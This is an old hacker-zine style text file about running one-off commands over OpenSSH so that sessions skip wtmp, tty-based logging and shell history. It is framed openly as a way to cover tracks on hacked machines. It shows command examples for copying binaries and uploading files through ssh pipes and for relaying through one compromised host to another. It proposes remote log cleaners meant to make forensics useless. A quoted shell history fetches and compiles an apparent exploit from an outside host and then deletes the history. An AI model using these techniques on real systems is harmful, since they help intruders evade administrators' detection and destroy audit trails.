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BASHing OpenSSH and for Fun and Profit

Table of Content

Author: Rembrandt
Status: Beta-3

0.  Intro
1.  Explanation of the Idea
1.1 What goes wrong?
2.  Simple Practical POCs
2.1 Getting Data
2.2 Writing Data
3.  Further Ideas
4.  Executing more commands

0. Intro
Hello everybody,

This time I`m writing about some stuff I've noticed during using OpenSSH.
I`m sure other people did notice it too and propably even earlier but as
far as I do know nobody wrote about it and I didn`t do it either
for some years now.
Well it isn`t something special nor any l33t-exploit but it`s still useable
to cover your tracks.
Because people often asked me to write something (and even publish something)
I decided to write about the OpenSSH-related stuff I did notice.

1. Explanation of the Idea
OpenSSH allows, to be kind of scriptable, to run one command
wich gets executed immediatly after your username and password/ssh-key was
verified. The sshd does not log anything into wtmp if you do use ssh like I`ll
explain below. So logcleaning becomes a lot faster if the responseable
Administrator does ever notices the missmatches in the different logfiles.

You may think you won't get logged anywhere and that's also correct 
except for these logfiles:
 - /var/log/secure  - if you used su/sudo 
 - /var/log/authlog - if your password or the key was accapted

It should be OS independent but I do list the tested OpenSSH versions/OSs too.

OpenSSH 4.4	(OpenBSD i386/amd64)
OpenSSH 4.3     (OpenBSD i386/amd64)
OpenSSH_3.8.1p1 (Debian-8.sarge.4 i386)

I did not have any host running with a commercial SSH-Version or a version from
another vendor then OpenSSH.

The whole idea is simple. Execute a command immediatly and analyse the output.
Because you don`t log in directly and don`t get a tty assigned.
This helps you to get not logged into too many logfiles
(exceptions are listed above) and also programs like ttyrec or termcap won't
log anything because you do never get a tty assigned.
Please do keep in mind that tools like netstat will show the connection
if it`s still present if netstat was executed.

Basic command:

A simple Example with anonymized hosts:
godfather $ ssh wizzard last
root      ttyp0    cpt.hook.darpa.net       Mon Apr 17 02:27   still logged in
cyneox    ttyp0    somewhere.un.int         Sun Apr 16 18:37 - 19:10  (00:33)
cyneox    ttyp5    somewhere.un.int         Sun Apr 16 14:49 - 14:50  (00:00)
cyneox    ttyp0    somewhere.un.int         Sun Apr 16 13:58 - 15:02  (01:04)
cyneox    ttyp5    somewhere.un.int         Sat Apr 15 10:20 - 10:25  (00:05)
cyneox    ttyp0    somewhere.un.int         Sat Apr 15 10:03 - 10:25  (00:21)

As you can see ssh did the following:

1. ssh connected to wizzard
2. Account verification
3. Executing the Command
4. Display the output of the command on your localhost
5. You may have noticed that I was not listed in the output

Information: I use Public-Key-Auth so I wasn`t asked for a password.
	     Otherwise you`ve to type your password.
	     I`m not in the output of the last command because
             I had no tty assigned and I`m also not logged into the wtmp
             either because of this.

Another example with sudo:
godfather $ ssh wizzard sudo tail -1 /var/log/authlog

Apr 17 04:38:57 wizzard sshd[29192]: Accepted publickey for rembrandt from
xx.xx.xx.xx port 38149 ssh2

What happened here?

1. ssh connected
2. Account verification
3. Executing the Command: sudo
4. Requesting local Password for sudo
   Because this is already kind of scripted it wont get hidden if you enter it.
   So it is readable for everybody who has an eye on your monitor.
5. Executing the Command: tail + parameters
6. Display the output on your localhost
7. Close the connection to your Computer

INFO: If you use sudo and/or su you get logged at /var/log/secure.
      If sudo was configured with timestamps sudo will act like you was logged
      in and it will remember your password for a short time (depends on the
      configuration) and you don`t need to retype it.
      This is useable if you got a user wich is allowed to use sudo and wanna
      execute some commands in a row. You could simply write a Shell-Script.

godfather $ ssh wizzard sudo tail -1 /var/log/secure
Apr 17 04:42:45 wizzard sudo: rembrandt : TTY=unknown ; PWD=/home/rembrandt ;
USER=root ; COMMAND=/usr/bin/tail -1 /var/log/secure

As you can see our actions where logged in /var/log/secure.
And as mentioned before we are also logged in /var/log/authlog.

Another example to show that we don`t alter the .bash_history:
godfather $ ssh linux.host.int head .bash_history
wget http://digital.net/~gandalf/NewDawn3.c
gcc NewDawn3.c
rm NewDawn3.c
rm -f .bash_history
godfather $ ssh linux.host.int w
 02:34:55 up 81 days,  2:03,  0 users,  load average: 0.00, 0.02, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
godfather $ ssh linux.host.int head .bash_history
wget http://digital.net/~gandalf/NewDawn3.c
gcc NewDawn3.c
rm NewDawn3.c
rm -f .bash_history
godfather $

Information: I don`t use SSH-Key-Auth so ssh askes me for my password.
	     The SSH Password gets encrypted.
	     But remember: The sudo-Password will be written to the screen!

1.1 What goes wrong?

The short answer has to be: Nothing
Everything works like it should.

But the long answer should be:
ssh was designed to run one command immediatly without writing Logs nor 
touching any Logfile except of /var/log/authlog and /var/log/secure
if you use su or sudo.
You could run a script wich runs the same Command on e.g. 30 Servers (f.e. with
Puplic-Key-Auth) and also saves the output (more later) to provide statistics.
We simply abuse this functionality in a way it wasn't concepted for.
So in case a administrator won't check all Logfiles by hand the responsable
Administrator should not notice the missmatches between /var/log/authlog and 
the wtmp or termcap-logfile.

2.  Simple Practical PoCs

The most simple PoC was provided above.
Running ssh this way allows you to use all advantages of your shell. You could
also dump the output to a file using the > command or do anything you can 

A simple Proof of Concept with a command used above:
godfather $ ssh wizzard last | head -2 > /tmp/testfoo
godfather $ cat /tmp/testfoo
root      ttyp0    somewhere.theocean.net Mon Apr 17 04:36   still logged in
root      ttyp0    somewhere.theocean.net Mon Apr 17 02:27 - 04:36  (02:09)

This shows how easy datamanipulating became!
It also points out that even arguments are no problem.

2.1 Getting Data
You noticed already that we can get ascii-Data like the Output of the lastlog
using last. But we won't give up and will get RAW (binary) data.

2.1 A Simple Practical PoC
godfather $ ssh wizzard cat /bin/ls > /tmp/datafoo
godfather $ file /tmp/datafoo
/tmp/datafoo: ELF 32-bit LSB executable, Intel 80386, version 1, for OpenBSD,
statically linked, stripped

godfather $ uname -a
OpenBSD godfather.helith.org 3.9 GENERIC.MP#0 amd64
godfather  $ scp ls root@kerberos:/tmp
godfather $ ssh root@kerberos
kerberos $ uname -a
OpenBSD kerberos.helith.org 3.8 GENERIC#286 i386
kerberos $ cd /tmp && ./ls -la scp 
-rwxr-xr-x   1 root  wheel  170592 Apr 17 05:08 ls

As you can see we`re perfectly able to get Binary-Files which also do work and
don´t get corrupted via SSH and without using scp nor sftp which could get
logged or is maybe even prohebit by the amdin too.
I choosed a binary except of a binary logfile because I wanted to show you that
these files are 100% valid and working.

2.2 Writing Data
Writing data is, thanks to the pipes, as easy as getting data.

Why don`t we use scp or sftp?
sftp could get logged in another Logfile and scp could be removed by a paranoid
Administrator. So with these methods we could use one hacked Box to jump to
another and we could even do filetransfers or modify logfiles "offline".

Basic command for file upload:
cat file | ssh host 'cat > file'

godfather $ cat rose.c | ssh root@kerberos 'cat > /tmp/r.c'
godfather $ ssh root@kerberos ls /tmp
godfather $

So that`s the theory and practice behind the file-upload.

3.  Further Ideas

With this technic you can download and upload files and won't get noticed by
some important system-Logfiles! If you don´t use su or sudo you´re
completly hidden!
Ok.. except the authlog. ;-)

This allows you to write REMOTE-Logcleaners wich clean Logfiles or manipulate
data on remote-hosts without the need to store your utilities there.
This makes Forensic nearly impossible because except of a copy of the modified
(in our case) Logfile you do not store anything temporary at the remote Host.
So the forensic will simply become useless and wont tell WhiteHats what Scripts
or Applications you used.

Further IDEAS: 

You enter your commands into a file and thus file gets parsed by a Script.
The Parser parses them and runs as many as possible at once and
pipes the output to a file.
This would reduce the ammount of notifications in the authlog
and it would speed up some stuff too.

Another neat Idea wich should get investigated is the fact that you
can run an SSH. It`s like executing any other command.
I found, for now, 2 Problems:

1. The host must be known in the known_hosts
 - I mean the file at the Box you want to use as Proxy
2. The 2nd SSH can`t ask you for a password.
 - Should be no problem with a SSH-Key

godfather $ ssh linux.host.int ssh another.box.int
Pseudo-terminal will not be allocated because stdin is not a terminal.
Permission denied, please try again.
Permission denied, please try again.
Permission denied (publickey,password,keyboard-interactive).

The Password must be provided by th Shell if that`s possible.
Perl provides something to do this or you simply use Key-Auth.
In my oppinion this should be investigated by you if you`re interested. ;-]

$ ssh linux.host.int 'ssh another.box.int' should fix the Problem. Or you put it
directly into some authorized_key wrapper.
Well just use ssh-agents for this.

This would allow you to use a Server as Proxy to get informations from
another (3rd) Box. If you maybe even control the "Proxy" you could even
remove yourself from the authlog and so it becomes completly stealthly.

Another very usefull fact is that you can run Portscans (and also other stuff).

You may think that logging in directly to the "Proxy" would be the better idea.
That`s not quiet true because your connection gets displayed in the Outputs
of w, who, users and other tools. So if you won't spend too much attention
(placing backdoors) to your
Proxy using SSH as descriped above will solve many things or makes them easier.
But you still have to live with the fact that you get at least logged into
one Logfile. But most admins don`t investigate authlog if other Logfiles won't
show something interesting and if so they`re
parsing the Logfile for non valid logins to stop ssh-brute-forcing.

And if you`re realy "paranoid" you`ll use ssh tunneled via tor anyway.
Don`t you?